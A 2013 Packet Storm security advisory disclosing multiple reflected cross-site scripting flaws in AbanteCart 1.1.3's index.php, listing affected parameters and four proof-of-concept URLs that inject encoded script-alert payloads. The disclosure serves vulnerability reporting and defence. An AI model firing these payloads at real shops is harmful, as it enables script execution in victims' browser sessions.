AbanteCart 1.1.3 Cross Site Scripting

2013-02-13T00:00:00
ID PACKETSTORM:120273
Type packetstorm
Reporter LiquidWorm
Modified 2013-02-13T00:00:00

Description

                                        
                                            `  
  
AbanteCart 1.1.3 (index.php) Multiple Reflected XSS Vulnerabilities  
  
  
Vendor: Belavier Commerce  
Product web page: http://www.abantecart.com  
Affected version: 1.1.3  
  
Summary: AbanteCart is a free PHP based eCommerce solution for  
merchants to provide ability creating online business and sell  
products online quick and efficient.  
  
Desc: AbanteCart suffers from multiple reflected cross-site scripting  
vulnerabilities. The issues are triggered when input passed via several  
parameters to 'index.php' script is not properly sanitized before being  
returned to the user. This can be exploited to execute arbitrary HTML  
and script code in a user's browser session in context of an affected  
site.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
Apache 2.4.2 (Win32)  
PHP 5.4.4  
MySQL 5.5.25a  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2013-5125  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5125.php  
  
  
08.02.2013  
  
--  
  
Affected parameters: limit, page, rt, sort, currency, product_id, language, s, manufacturer_id, token.  
  
PoC:  
  
http://localhost/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E  
http://localhost/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product  
http://localhost/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
http://localhost/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E  
`